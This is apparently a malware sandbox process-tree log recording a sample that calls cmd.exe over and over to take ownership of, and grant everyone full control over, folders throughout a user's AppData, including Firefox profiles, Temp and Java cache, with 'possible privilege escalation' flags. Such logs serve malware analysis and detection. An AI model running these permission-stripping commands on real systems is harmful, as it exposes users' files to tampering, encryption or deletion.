C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\new && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\new /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\new3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Media && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows Media /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Media3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0 && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.03⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\Gadgets && icacls C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\Gadgets /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\Gadgets3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Microsoft Help && icacls C:\Users\Admin\AppData\Local\Microsoft Help /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Microsoft Help3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla && icacls C:\Users\Admin\AppData\Local\Mozilla /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.Admin && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.Admin /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.Admin3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.Admin /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\cache2 && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\cache2 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\cache23⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\cache2 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\cache2\doomed && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\cache2\doomed /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\cache2\doomed3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\cache2\doomed /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\cache2\entries && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\cache2\entries /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\cache2\entries3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\cache2\entries /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\safebrowsing && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\safebrowsing /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\safebrowsing3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\safebrowsing /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings\main && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings\main /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings\main3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings\main /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings\main\ms-language-packs && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings\main\ms-language-packs /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings\main\ms-language-packs3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings\main\ms-language-packs /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings\main\ms-language-packs\browser && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings\main\ms-language-packs\browser /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings\main\ms-language-packs\browser3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings\main\ms-language-packs\browser /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings\main\ms-language-packs\browser\newtab && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings\main\ms-language-packs\browser\newtab /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings\main\ms-language-packs\browser\newtab3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\settings\main\ms-language-packs\browser\newtab /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\startupCache && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\startupCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\startupCache3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\startupCache /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\thumbnails && icacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\thumbnails /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\thumbnails3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\id09dv1m.default-release\thumbnails /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp && icacls C:\Users\Admin\AppData\Local\Temp /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\1739162879 && icacls C:\Users\Admin\AppData\Local\Temp\1739162879 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\17391628793⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\1739162879 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\hsperfdata_Admin && icacls C:\Users\Admin\AppData\Local\Temp\hsperfdata_Admin /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\hsperfdata_Admin3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\hsperfdata_Admin /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\Low && icacls C:\Users\Admin\AppData\Local\Temp\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\Low3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\Low /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x64 Redistributable Setup_10.0.40219 && icacls C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x64 Redistributable Setup_10.0.40219 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x64 Redistributable Setup_10.0.402193⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.40219 && icacls C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.40219 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.402193⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\mozilla-temp-files && icacls C:\Users\Admin\AppData\Local\Temp\mozilla-temp-files /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\mozilla-temp-files3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\mozilla-temp-files /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\scoped_dir1776_1974770315 && icacls C:\Users\Admin\AppData\Local\Temp\scoped_dir1776_1974770315 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\scoped_dir1776_19747703153⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\scoped_dir1776_1974770315 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\scoped_dir1776_1974770315\CRX_INSTALL && icacls C:\Users\Admin\AppData\Local\Temp\scoped_dir1776_1974770315\CRX_INSTALL /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\scoped_dir1776_1974770315\CRX_INSTALL3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\scoped_dir1776_1974770315\CRX_INSTALL /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\scoped_dir1776_749502819 && icacls C:\Users\Admin\AppData\Local\Temp\scoped_dir1776_749502819 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\scoped_dir1776_7495028193⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\scoped_dir1776_749502819 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\scoped_dir1776_749502819\CRX_INSTALL && icacls C:\Users\Admin\AppData\Local\Temp\scoped_dir1776_749502819\CRX_INSTALL /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\scoped_dir1776_749502819\CRX_INSTALL3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\scoped_dir1776_749502819\CRX_INSTALL /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\VBE && icacls C:\Users\Admin\AppData\Local\Temp\VBE /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\VBE3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\VBE /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temp\WPDNSE && icacls C:\Users\Admin\AppData\Local\Temp\WPDNSE /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temp\WPDNSE3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Local\Temp\WPDNSE /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Local\Temporary Internet Files && icacls C:\Users\Admin\AppData\Local\Temporary Internet Files /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Local\Temporary Internet Files3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow && icacls C:\Users\Admin\AppData\LocalLow /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Microsoft && icacls C:\Users\Admin\AppData\LocalLow\Microsoft /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Microsoft3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Microsoft /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache && icacls C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content && icacls C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData && icacls C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer && icacls C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services && icacls C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Mozilla && icacls C:\Users\Admin\AppData\LocalLow\Mozilla /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Mozilla3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Mozilla /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun && icacls C:\Users\Admin\AppData\LocalLow\Sun /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.03⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\0 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\0 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\03⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\0 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\1 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\1 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\1 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\10 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\10 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\103⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\10 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\11 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\11 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\113⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\11 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\123⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\133⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13 /grant everyone:(f)3⤵
-
-
-
